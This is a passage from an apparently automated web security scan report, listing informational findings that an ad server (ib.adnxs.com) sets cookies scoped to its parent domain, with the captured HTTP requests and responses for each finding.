P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 21-Jan-2011 00:29:59 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:29:59 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb35548=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Wed, 20-Apr-2011 00:29:59 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb727727=5_[r^kI/7ZrO@Pn0nf8M9a:9p?enc=usDlsWbk4j8Ox07TwgDhPwAAAAAAAAhADsdO08IA4T-6wOWxZuTiP5cuKdiuIR8PBWHfHSmrEEIHgjdNAAAAAGI7AwA3AQAAZAAAAAIAAAA4UAIAPV0AAAEAAABVU0QAVVNEANgCWgCqAQAA-AUBAgUCAAUAAAAAbSD3AAAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295483399%29%3Buf%28%27r%27%2C+151608%2C+1295483399%29%3Bppv%2882%2C+%271089626669681553047%27%2C+1295483399%2C+1305851399%2C+2132%2C+23869%29%3Bppv%2884%2C+%271089626669681553047%27%2C+1295483399%2C+1305851399%2C+2132%2C+23869%29%3Bppv%2811%2C+%271089626669681553047%27%2C+1295483399%2C+1305851399%2C+2132%2C+23869%29%3Bppv%2882%2C+%271089626669681553047%27%2C+1295483399%2C+1305851399%2C+2132%2C+23869%29%3Bppv%2884%2C+%271089626669681553047%27%2C+1295483399%2C+1305851399%2C+2132%2C+23869%29%3Bppv%2887%2C+%271089626669681553047%27%2C+1295483399%2C+1295569799%2C+2132%2C+23869%29%3Bppv%28619%2C+%271089626669681553047%27%2C+1295483399%2C+1295569799%2C+2132%2C+23869%29%3Bppv%28620%2C+%271089626669681553047%27%2C+1295483399%2C+1295569799%2C+2132%2C+23869%29%3Bppv%28621%2C+%271089626669681553047%27%2C+1295483399%2C+1295569799%2C+2132%2C+23869%29%3B&cnd=!LR4gugjUEBC4oAkYwI8BIL26ASgAMVSzvcxm5OI_QhMIABAAGAAgASj-__________8BQg0IUhC-40sYpQggAygGQg0IVBDVlhsYgQQgAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Fri, 21-Jan-2011 00:29:59 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:29:59 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhcvjr/?0P(*AuB-u**g1:XIEPGUMbNTs4#%DBZoIf(PCR0ep_TvkXX49-qCQB:hlS?9mnBp47]h3?C^q0Wv5MQ*ZwB-!3PYw5C215#'1yq9A1-rNS-!<d=acxcxImXfqnsb.XDvw(L75^wI`We*m2)^fn_u4.+o#pbc^I%Bp(GQ'kk7r2?fI0; path=/; expires=Wed, 20-Apr-2011 00:29:59 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 20 Jan 2011 00:29:59 GMT
Content-Length: 439

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.martini/;net=cm;u=,cm-69155988_1295482815,11d765b6a10b1b3,sports,cm.cm_aa_gn1-cm.sports_l-cm.weath_l;;cmw=owl;sz=
...[SNIP]...

7.20. http://ib.adnxs.com/ptj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.martini&size=160x600&referrer=http%3A%2F%2Fwww.sailinganarchy.com%2Findex_page1.php&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.martini%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-23797598_1295482817%2C11d765b6a10b1b3%2Csports%2Ccm.cm_aa_gn1-cm.weath_l-cm.sports_l%3B%3Bcmw%3Dowl%3Bsz%3D160x600%3Bnet%3Dcm%3Bord1%3D881330%3Bcontx%3Dsports%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.sports_l%3Bord%3D3751955344%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.sailinganarchy.com/index_page1.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=EAAYAA..; acb113196=5_[r^kI/7ZrO@Pn0nf8MvlYT!?enc=usDlsWbk4j8Ox07TwgDhPwAAAAAAAAhADsdO08IA4T-6wOWxZuTiP8LS2pGwuOcdBWHfHSmrEEK_fzdNAAAAAGI7AwA3AQAAZAAAAAIAAAA4UAIAPV0AAAEAAABVU0QAVVNEANgCWgCqAQAA4AUBAgUCAAUAAAAAsiOTEgAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482815%29%3Buf%28%27r%27%2C+151608%2C+1295482815%29%3Bppv%2882%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2884%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2811%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2882%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2884%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2887%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28619%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28620%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28621%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3B&cnd=!LR4gugjUEBC4oAkYwI8BIL26ASgAMVSzvcxm5OI_QhMIABAAGAAgASj-__________8BQg0IUhC-40sYpQggAygGQg0IVBDVlhsYgQQgAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhcvjr/?0P(*AuB-u**g1:XIEPGUMbNTs4#%DBZoIf(PCR0ep_TvkXX49-qCQB:hlS?9mnBp47]h3?C^q0Wv5MQ*ZwB-!3PYw5C215#'1yq9A1-rNS-!<d=acxcxImXfqnsb.XDvw(L75^wACGY+1'U74=YF]nOpI=48$^Tx()%_!wzkF2Ple$

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 21-Jan-2011 00:20:17 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:20:17 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Wed, 20-Apr-2011 00:20:17 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb303093=5_[r^XI()vrO@Pn0nf8MwM9g$?enc=pyOAm8UL4j-wuVlyyz3gPwAAAAAAAAhAsLlZcss94D-nI4CbxQviP9CL-hxz-rYyBWHfHSmrEELBfzdNAAAAAGI7AwA3AQAAZAAAAAIAAAA5UAIAPV0AAAEAAABVU0QAVVNEAKAAWAKqAQAAeggBAgUCAAUAAAAALyC12AAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482817%29%3Buf%28%27r%27%2C+151609%2C+1295482817%29%3Bppv%2882%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2884%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2811%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2882%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2884%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2887%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3Bppv%28619%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3Bppv%28620%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3Bppv%28621%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3B&cnd=!MR7WtAjUEBC5oAkYwI8BIL26ASgAMbKd76fGC-I_QhMIABAAGAAgASj-__________8BQg0IUhC54i4YoxkgAygGQg0IVBC5yTMYhwogAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Fri, 21-Jan-2011 00:20:17 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:20:17 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7*@E:3F.0s]#%2L_'x%SEV/hnK7#=G#<huqu*`^-sAq$WUeUDuqkMr+c^Z(+ql_Y`mC^.fk]u+-ptW1B'#)hgVCgQw>7'NF7uNVkG0XN^BPJ.^ZXwcsDU[n.KmyD0IP?EJtun(LG%y$qg]mwnXkD%rDs0:0$Ob('INuCClbQ^7w=g32LzAgGCPGs/^Zf3+TaP; path=/; expires=Wed, 20-Apr-2011 00:20:17 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 20 Jan 2011 00:20:17 GMT
Content-Length: 440

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.martini/;net=cm;u=,cm-23797598_1295482817,11d765b6a10b1b3,sports,cm.cm_aa_gn1-cm.weath_l-cm.sports_l;;cmw=owl;sz=
...[SNIP]...

7.21. http://ib.adnxs.com/ptj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.martini&size=160x600&referrer=http%3A%2F%2Fwww.sailinganarchy.com%2Findex_page1.php&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.martini%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-23797598_1295482817%2C11d765b6a10b1b3%2Csports%2Ccm.cm_aa_gn1-cm.weath_l-cm.sports_l%3B%3Bcmw%3Dowl%3Bsz%3D160x600%3Bnet%3Dcm%3Bord1%3D881330%3Bcontx%3Dsports%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.sports_l%3Bord%3D3751955344%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.sailinganarchy.com/index_page1.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=EAAYAA..; acb113196=5_[r^kI/7ZrO@Pn0nf8MvlYT!?enc=usDlsWbk4j8Ox07TwgDhPwAAAAAAAAhADsdO08IA4T-6wOWxZuTiP8LS2pGwuOcdBWHfHSmrEEK_fzdNAAAAAGI7AwA3AQAAZAAAAAIAAAA4UAIAPV0AAAEAAABVU0QAVVNEANgCWgCqAQAA4AUBAgUCAAUAAAAAsiOTEgAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482815%29%3Buf%28%27r%27%2C+151608%2C+1295482815%29%3Bppv%2882%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2884%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2811%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2882%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2884%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2887%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28619%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28620%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28621%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3B&cnd=!LR4gugjUEBC4oAkYwI8BIL26ASgAMVSzvcxm5OI_QhMIABAAGAAgASj-__________8BQg0IUhC-40sYpQggAygGQg0IVBDVlhsYgQQgAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhcvjr/?0P(*AuB-u**g1:XIEPGUMbNTs4#%DBZoIf(PCR0ep_TvkXX49-qCQB:hlS?9mnBp47]h3?C^q0Wv5MQ*ZwB-!3PYw5C215#'1yq9A1-rNS-!<d=acxcxImXfqnsb.XDvw(L75^wACGY+1'U74=YF]nOpI=48$^Tx()%_!wzkF2Ple$

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 21-Jan-2011 00:30:09 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:30:09 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb113196=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Wed, 20-Apr-2011 00:30:09 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb614429=5_[r^XI()vrO@Pn0nf8M=sK?z?enc=pyOAm8UL4j-wuVlyyz3gPwAAAAAAAAhAsLlZcss94D-nI4CbxQviP014-CWPh5xaBWHfHSmrEEIRgjdNAAAAAGI7AwA3AQAAZAAAAAIAAAA5UAIAPV0AAAEAAABVU0QAVVNEAKAAWAKqAQAAnAgBAgUCAAUAAAAAzB7BYQAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295483409%29%3Buf%28%27r%27%2C+151609%2C+1295483409%29%3Bppv%2882%2C+%276529242608667490381%27%2C+1295483409%2C+1305851409%2C+2132%2C+23869%29%3Bppv%2884%2C+%276529242608667490381%27%2C+1295483409%2C+1305851409%2C+2132%2C+23869%29%3Bppv%2811%2C+%276529242608667490381%27%2C+1295483409%2C+1305851409%2C+2132%2C+23869%29%3Bppv%2882%2C+%276529242608667490381%27%2C+1295483409%2C+1305851409%2C+2132%2C+23869%29%3Bppv%2884%2C+%276529242608667490381%27%2C+1295483409%2C+1305851409%2C+2132%2C+23869%29%3Bppv%2887%2C+%276529242608667490381%27%2C+1295483409%2C+1295569809%2C+2132%2C+23869%29%3Bppv%28619%2C+%276529242608667490381%27%2C+1295483409%2C+1295569809%2C+2132%2C+23869%29%3Bppv%28620%2C+%276529242608667490381%27%2C+1295483409%2C+1295569809%2C+2132%2C+23869%29%3Bppv%28621%2C+%276529242608667490381%27%2C+1295483409%2C+1295569809%2C+2132%2C+23869%29%3B&cnd=!MR7WtAjUEBC5oAkYwI8BIL26ASgAMbKd76fGC-I_QhMIABAAGAAgASj-__________8BQg0IUhC54i4YoxkgAygGQg0IVBC5yTMYhwogAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Fri, 21-Jan-2011 00:30:09 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:30:09 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7*@E:3F.0s]#%2L_'x%SEV/hnK7#=G#<huqu*`^-sAq$WUeUDuqkMr+c^Z(+ql_Y`mC^.fk]u+-ptW1B'#)hgVCgQw>7'NF7uNVkG0XN^BPJ.^ZXwcsDU[n.KmyD0IP?EJtun(LG%y$qg]mwnXkD%zsU*oU'LW('INuCClbQ^7w=g32M!L$Ue*y[MoYC89[aS; path=/; expires=Wed, 20-Apr-2011 00:30:09 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 20 Jan 2011 00:30:09 GMT
Content-Length: 440

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.martini/;net=cm;u=,cm-23797598_1295482817,11d765b6a10b1b3,sports,cm.cm_aa_gn1-cm.weath_l-cm.sports_l;;cmw=owl;sz=
...[SNIP]...

7.22. http://ib.adnxs.com/ptj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.martini&size=160x600&referrer=http%3A%2F%2Fwww.sailinganarchy.com%2Findex_page1.php&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.martini%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-93054228_1295482822%2C11d765b6a10b1b3%2Csports%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sports_l-cm.weath_l%3B%3Bcmw%3Dowl%3Bsz%3D160x600%3Bnet%3Dcm%3Bord1%3D405617%3Bcontx%3Dsports%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sports_l%3Bbtg%3Dcm.weath_l%3Bord%3D423951444%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.sailinganarchy.com/index_page1.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: acb113196=5_[r^kI/7ZrO@Pn0nf8MvlYT!?enc=usDlsWbk4j8Ox07TwgDhPwAAAAAAAAhADsdO08IA4T-6wOWxZuTiP8LS2pGwuOcdBWHfHSmrEEK_fzdNAAAAAGI7AwA3AQAAZAAAAAIAAAA4UAIAPV0AAAEAAABVU0QAVVNEANgCWgCqAQAA4AUBAgUCAAUAAAAAsiOTEgAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482815%29%3Buf%28%27r%27%2C+151608%2C+1295482815%29%3Bppv%2882%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2884%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2811%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2882%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2884%2C+%272154894015220863682%27%2C+1295482815%2C+1305850815%2C+2132%2C+23869%29%3Bppv%2887%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28619%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28620%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28621%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3B&cnd=!LR4gugjUEBC4oAkYwI8BIL26ASgAMVSzvcxm5OI_QhMIABAAGAAgASj-__________8BQg0IUhC-40sYpQggAygGQg0IVBDVlhsYgQQgAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; sess=1; icu=EAAYAA..; acb303093=5_[r^XI()vrO@Pn0nf8MwM9g$?enc=pyOAm8UL4j-wuVlyyz3gPwAAAAAAAAhAsLlZcss94D-nI4CbxQviP9CL-hxz-rYyBWHfHSmrEELBfzdNAAAAAGI7AwA3AQAAZAAAAAIAAAA5UAIAPV0AAAEAAABVU0QAVVNEAKAAWAKqAQAAeggBAgUCAAUAAAAALyC12AAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482817%29%3Buf%28%27r%27%2C+151609%2C+1295482817%29%3Bppv%2882%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2884%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2811%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2882%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2884%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2887%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3Bppv%28619%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3Bppv%28620%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3Bppv%28621%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3B&cnd=!MR7WtAjUEBC5oAkYwI8BIL26ASgAMbKd76fGC-I_QhMIABAAGAAgASj-__________8BQg0IUhC54i4YoxkgAygGQg0IVBC5yTMYhwogAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7*@E:3F.0s]#%2L_'x%SEV/hnK7#=G#<huqu*`^-sAq$WUeUDuqkMr+c^Z(+ql_Y`mC^.fk]u+-ptW1B'#)hgVCgQw>7'NF7uNVkG0XN^BPJ.^ZXwcsDU[n.KmyD0IP?EJtun(LG%y$qg]mwnXkD%rDs0:0$Ob('INuCClbQ^7w=g32LzAgGCPGs/^Zf3+TaP

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 21-Jan-2011 00:20:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:20:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Wed, 20-Apr-2011 00:20:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb778475=5_[r^XI()vrO@Pn0nf8M!j@7*?enc=pyOAm8UL4j-wuVlyyz3gPwAAAAAAAAhAsLlZcss94D-nI4CbxQviPzkMt5lmDXglBWHfHSmrEELGfzdNAAAAAGI7AwA3AQAAZAAAAAIAAAA5UAIAPV0AAAEAAABVU0QAVVNEAKAAWAKqAQAA_gYBAgUCAAUAAAAAlR4hLwAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482822%29%3Buf%28%27r%27%2C+151609%2C+1295482822%29%3Bppv%2882%2C+%272699922710925347897%27%2C+1295482822%2C+1305850822%2C+2132%2C+23869%29%3Bppv%2884%2C+%272699922710925347897%27%2C+1295482822%2C+1305850822%2C+2132%2C+23869%29%3Bppv%2811%2C+%272699922710925347897%27%2C+1295482822%2C+1305850822%2C+2132%2C+23869%29%3Bppv%2882%2C+%272699922710925347897%27%2C+1295482822%2C+1305850822%2C+2132%2C+23869%29%3Bppv%2884%2C+%272699922710925347897%27%2C+1295482822%2C+1305850822%2C+2132%2C+23869%29%3Bppv%2887%2C+%272699922710925347897%27%2C+1295482822%2C+1295569222%2C+2132%2C+23869%29%3Bppv%28619%2C+%272699922710925347897%27%2C+1295482822%2C+1295569222%2C+2132%2C+23869%29%3Bppv%28620%2C+%272699922710925347897%27%2C+1295482822%2C+1295569222%2C+2132%2C+23869%29%3Bppv%28621%2C+%272699922710925347897%27%2C+1295482822%2C+1295569222%2C+2132%2C+23869%29%3B&cnd=!MR7WtAjUEBC5oAkYwI8BIL26ASgAMbKd76fGC-I_QhMIABAAGAAgASj-__________8BQg0IUhC54i4YoxkgAygGQg0IVBC5yTMYhwogAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Fri, 21-Jan-2011 00:20:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:20:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG49EE:3F.0s]#%2L_'x%SEV/hnLCF=G#<huqu*`^-sAq$WUeUDuqkMr+c^Z(+ql_Y`mC^.fk]u+-ptW1B'#)'qHqWd-AGmScENVx-p:Y9b66ZCJLN[8yvY$hcwDwhp^RbpUUZcwln=gw`]wKC0A)'9Dj6XfCjr1a#[D:I(3<csJ3xssMdQ3gcc=Zx1u*B$99h/3z-gm; path=/; expires=Wed, 20-Apr-2011 00:20:22 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 20 Jan 2011 00:20:22 GMT
Content-Length: 504

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.martini/;net=cm;u=,cm-93054228_1295482822,11d765b6a10b1b3,sports,cm.cm_aa_gn1-cm.sportsreg-cm.sports_l-cm.weath_l
...[SNIP]...

7.23. http://ib.adnxs.com/ptj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.martini&size=728x90&referrer=http%3A%2F%2Fwww.sailinganarchy.com%2Findex_page1.php&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.martini%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-82053649_1295482372%2C11d765b6a10b1b3%2Csports%2Ccm.cm_aa_gn1-cm.weath_l%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Bord1%3D707118%3Bcontx%3Dsports%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.weath_l%3Bord%3D3271752524%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.sailinganarchy.com/index_page1.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=EAAYAA..; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG10Qcvjr/?0P(*AuB-u**g1:XICjmUMbNTn>qsXgZ2Ox#Kzwi3jhndu4.q@P`fym?BM6A(6j?L^F^pT+$t)o#'1yqNmTr+csDU[n.KmyD0IP?EJtun(LG%y$qg]mw!5$=%sod-+0?6As/^Y`/=Uxi

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
